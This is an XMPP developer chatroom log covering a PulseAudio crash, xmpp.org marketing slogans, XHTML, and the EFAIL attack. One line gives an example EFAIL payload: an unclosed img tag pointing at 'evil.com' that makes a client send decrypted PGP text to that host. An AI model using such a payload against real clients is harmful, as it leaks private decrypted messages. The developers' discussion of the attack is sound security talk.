jonaswhow do a lot of offline messages crash pulseaudio.
Nekithas left
MattJjonasw, notification sound. I think it probably tried to play thousands of them at once
jonaswand opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.
jonaswbut still a bug in pulse probably :)
MattJYeah
rionhas joined
forensic58has left
forensic58has joined
marmistrzhas left
tahas joined
seandreashas joined
seandreashas joined
lskdjfhas left
winfriedhas left
marmistrzhas left
la|r|mahas left
la|r|mahas joined
la|r|mahas left
la|r|mahas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
lskdjfhas joined
Valerianhas left
Nekithas joined
seandreashas joined
flow> jonasw> but still a bug in pulse probably :)
flownot sure if lennart would agree
jonaswAFAIK lennart isn’t involved with pulse anymore
ZashI'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.
jonaswI feel you
forensic58has left
forensic58has joined
alexishas left
alexishas joined
Neustradamushas left
alexishas left
alexishas joined
moparisthebesthas joined
jerehas joined
moparisthebesthas joined
xnyhpshas left
Andrew Nenakhovhas left
Andrew Nenakhovhas joined
lumihas left
lumihas joined
xnyhpshas joined
Guushas left
andyhas left
andyhas joined
jubalhhas joined
Andrew Nenakhovhas left
Andrew Nenakhovhas joined
jerehas left
jerehas joined
Nekithas joined
ThibGhas joined
lorddavidiiihas left
alexishas left
alexishas joined
jubalhhas left
ThibGhas joined
forensic58has left
forensic58has joined
ralphmhas joined
ThibGhas left
ThibGhas joined
rtq3has left
rtq3has joined
vanitasvitaehas left
Wiktorhas left
mimi89999has joined
goffihas left
vanitasvitaehas left
jubalhhas joined
jubalhhas left
Guushas left
debaclehas joined
Guushas left
Valerianhas joined
debacleRecently I complained about xmpp.org advertising XMPP as "most secure" messaging standard. Some people agreed, that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt, that XMPP is exceptionally secure :~)
debacleI suggest to replace "most secure" with the word "universal".
ZashSecure in its awesomeness
Seve/SouLYes
Seve/SouLthat's the idea for me
debacleI believe, that the most important aspect of XMPP compared to other, similar technologies is it's "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.
Seve/SouLSomething that would mean in a way 'the standard'
Seve/SouLI like that
moparisthebesthas left
danielThe literal battle tested might also not fly well with some people...
ZashThe Standard.
Seve/SouLYes.
ZashIt's probably fine for it to be bold
debacle"Battle-tested" might also be something to change, true.
ZashWhat was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.
Zashdebacle: That might actually be true in a literal sense.
danielZash: that's the problem
debacleYes, but do you want to use this use case for the ads? :~)
debaclePacifists or anti-bellicists might go to Matrix then :~)
danielI mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience
jubalhhas joined
debacleXEPs are lethal in some way...
jjrhhas left
ZashXEPs don't kill people. People kill people.
ThibGhas joined
jjrhhas left
Valerianhas left
andyhas joined
Valerianhas joined
danielThat would make for a better slogan
j.rhas joined
KevI raised the tagline at the time. It was a deliberate decision by (then) Board.
debacleBack to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)
ZashBoard?
debacleMaybe also s/Battle-tested./Secure./ :
debacleMaybe also s/Battle-tested./Secure./ ?
ZashWhy not have bold marketing tho?
debacleBold?
danielNot everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing
ZashAll publicity is good publicity, as they say
debacleThe EFFail was no good marketing, neither for PGP nor EFF.
ZashWhen everyone has forgotten the details, they might remember "PGP". If so, then it was a success.
alacerhas left
vanitasvitaeI should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.
KevIf people read the details, they'd see it had nothing to do with pgp in the first place :)
debacleThe remember "PGP is dangerous, I must uninstall it and replace with Signal"
debacleThey remember "PGP is dangerous, I must uninstall it and replace with Signal"
Zashvanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible
vanitasvitaeZash, no, it was also about PGP
vanitasvitaePGP was just harder to attack
moparisthebestnot really, it was an HTML thing, you know, like xhmtl-im
danielIf you put xhtml in your ox one could maybe do something similar
danielUnder some conditions
jjrhhas left
danielIf you implemted both xhtml and your ox in a bad way that is
vanitasvitaedaniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.
vanitasvitaeBut I have to evaluate that in more depth
ZashIf you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here
danielYeah I think you could deliberately Design and implemted ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza
seandreashas joined
MattJdebacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there
debacleMattJ, will do, thanks!
j.rhas joined
vanitasvitaeby the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D
ZashAs long as messages are either encrypted or not, it should be fine
jjrhhas left
Guushas left
jjrhhas left
Guushas left
Guushas left
jubalhhas left
Guushas left
Guushas left
Guushas left
ThibGhas left
Guushas joined
ThibGhas joined
Guushas left
Guushas left
Guushas joined
mrdoctorwhohas left
andyhas left
seandreashas left
j.rhas left
j.rhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
j.rhas joined
j.rhas joined
j.rhas left
j.rhas joined
jubalhhas joined
j.rhas joined
j.rhas joined
waqashas joined
j.rhas joined
Wiktorwho would've though using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/
ZashNah, who cares, kill XHTML
ZashXHTML is dead, long live tag soup!
Wiktoryep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death
ZashNah, XHTML 2 was bad because it fixed stupid early mistakes in HTML
ZashLike a single <h> instead of <h[1-6]>
Wiktorsingle <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/
forensic58has left
Link MauveWiktor, s/green/yellow/ :p
forensic58has joined
j.rhas joined
WiktorLink Mauve: yes, lol, I've imagined yellow but said green, weird
lovetoxhas left
moparisthebestI miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer
moparisthebestbecause the img width/height were too large of integers...
Wiktordeathpic.png, sounds dangerous
jubalhhas left
Link MauveThis is scary at so many levels.
Link MauveWhy would parsing an HTML integer trigger a kernel panic.
moparisthebestyea everyone thought it was the image, it wasn't, it's an overflow with the tags :)
moparisthebestLink Mauve, right? :)
moparisthebestI want to say it was vulnerable to windows xp sp1, then sp2 fixed it
Ge0rG"vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?
forensic58has left
forensic58has joined
Valerianhas left
Valerianhas joined
ralphmhas left
Valerianhas left
Valerianhas joined
jubalhhas joined
jubalhhas left
rionhas left
Steve Killehas left
Steve Killehas left
Steve Killehas left
Steve Killehas left
Steve Killehas joined
lorddavidiiihas left
rtq3has left
ibikkhas joined
jubalhhas joined
lorddavidiiihas joined
lskdjfhas left
ralphmhas joined
lorddavidiiihas left
Valerianhas left
Valerianhas joined
rtq3has joined
jubalhhas left
marmistrzhas left
Steve Killehas left
la|r|mahas joined
lorddavidiiihas joined
Valerianhas left
Valerianhas joined
j.rhas joined
j.rhas joined
tahas left
mhterreshas joined
mhterreshas left
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
lskdjfhas joined
xnyhpshas joined
Wiktorhas joined
Nekithas joined
ibikkhas left
flowhas left
ibikkhas left
lorddavidiiihas left
Guushas left
jjrhhas left
flowhas left
jjrhhas left
seandreashas joined
lorddavidiiihas joined
rtq3has left
rtq3has joined
Guushas left
Guushas left
jjrhhas left
Guushas left
ibikkhas joined
peterhas joined
andyhas joined
Timhas joined
Chobbeshas joined
moparisthebestare there any XSD wizards in here that could tell me if according to this schema if I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property
moparisthebesthttp://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>
moparisthebestso I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)
rionhas joined
seandreashas joined
Valerianhas joined
la|r|mahas left
la|r|mahas joined
jubalhhas joined
jubalhhas left
ralphmhas left
lnjhas left
lorddavidiiihas left
jonaswmoparisthebest, I’m rather sure that XSD can’t express such things
lovetoxhas joined
moparisthebestthanks jonasw , as an aside you've been doing an exceptional job as editor lately